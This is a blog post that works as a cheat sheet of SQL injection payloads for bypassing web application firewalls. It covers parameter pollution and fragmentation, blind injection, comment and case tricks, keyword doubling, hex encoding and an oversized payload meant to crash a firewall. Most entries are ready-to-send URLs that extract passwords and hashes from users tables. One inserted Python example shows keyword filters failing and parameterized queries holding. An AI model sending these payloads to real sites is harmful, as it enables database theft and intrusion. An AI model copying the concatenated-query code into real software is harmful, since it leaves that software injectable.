
Armand.nz


SQL Injection Example

#websec #sql

SQL Injection - Normalization Method

/?id=1/*union*/union/*select*/select+1,2,3/*

Using HTTP Parameter Pollution (HPP)

Vulnerable code

SQL=" select key from table where id= "+Request.QueryString("id")

This request succeeds using the HPP technique (the fragments are reassembled when the server concatenates the repeated id parameters):

/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

Bypassing WAF: SQL Injection – HPF (HTTP Parameter Fragmentation)

Vulnerable code example

Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);

These requests can succeed using HPF (each parameter carries one fragment of the query, joined by comments):

/?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--

Bypassing WAF: Blind SQL Injection

Using logical requests AND/OR

The following requests get past many WAFs:

/?id=1+OR+0x50=0x50
/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

An example of signature bypass.

The following request matches a WAF signature:

/?id=1+union+(select+1,2+from+users)

But the signatures in use can sometimes be bypassed:

/?id=1+union+(select+'xz'from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)

Bypass with Comments

SQL comments allow us to bypass a lot of filtering and WAFs.

Code:

http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--

Case Changing

Some WAFs filter only lowercase SQL keywords.

Regex Filter:

http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--

Replaced Keywords

Some applications and WAFs use preg_replace to remove all SQL keywords. This is easily bypassed: the keyword is removed once, and the surrounding text re-forms it.

http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--

In some cases the SQL keyword is filtered out and replaced with whitespace, so “%0b” (vertical tab) can be used to bypass it.

http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
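Why keyword removal is not a fix, and what is: the following is an added example (not code from the original page) that wires the page's vulnerable string-concatenation pattern behind a constructed preg_replace-style keyword filter, feeds it the replaced-keyword payload from this section, and contrasts it with a parameterized query. The users table, its rows and the column names are constructed sample data.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed in-memory sample data (not from the original page).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, login TEXT, pwd TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "alice", "s3cret"), (2, "bob", "hunter2")])

KEYWORDS = ("union", "select")


def naive_filter(value: str) -> str:
    """Blacklist in the style the page describes: delete each keyword once,
    case-insensitively. Deleting 'union' from 'UNunionION' leaves 'UNION'."""
    for kw in KEYWORDS:
        value = re.sub(kw, "", value, flags=re.IGNORECASE)
    return value


def vulnerable_lookup(raw_id: str) -> list:
    """String concatenation as in the page's vulnerable code, behind the
    keyword filter. The decoded parameter is parsed as SQL, not as a value."""
    sql = "select id, login, pwd from users where id=" + naive_filter(unquote_plus(raw_id))
    return conn.execute(sql).fetchall()


def safe_lookup(raw_id: str) -> list:
    """Parameterized query: the whole string is bound as one value, so no
    keyword filtering or WAF signature is needed for the query to stay intact.
    (Rejecting non-integer ids before the query is a sensible extra check.)"""
    sql = "select id, login, pwd from users where id=?"
    return conn.execute(sql, (unquote_plus(raw_id),)).fetchall()


if __name__ == "__main__":
    payload = "1+UNunionION+SEselectLECT+1,2,3--"   # the page's replaced-keyword payload
    print(vulnerable_lookup(payload))   # an attacker-chosen row (1, 2, 3) appears
    print(safe_lookup(payload))         # []  : the payload never becomes SQL
    print(safe_lookup("1"))             # [(1, 'alice', 's3cret')]
```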

Crashing the Firewall via Buffer Overflow

Buffer Overflow / Firewall Crash: many firewalls are written in C/C++ and can be crashed with a buffer overflow.

http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4…

Replace Characters with their HEX Values: some characters can be replaced with their HEX (URL-encoded) values.

Example (which decodes to “union select”):

http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….

Misc Exploitable Functions

Many firewalls try to offer more protection by adding prototype or unusual functions, which, of course, can be exploited.

Example: the firewall below replaces “*” (asterisks) with whitespace, so the following works:

# If the firewall removes the “*”, the result is: 15+union+select….
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…

Copyright © Armand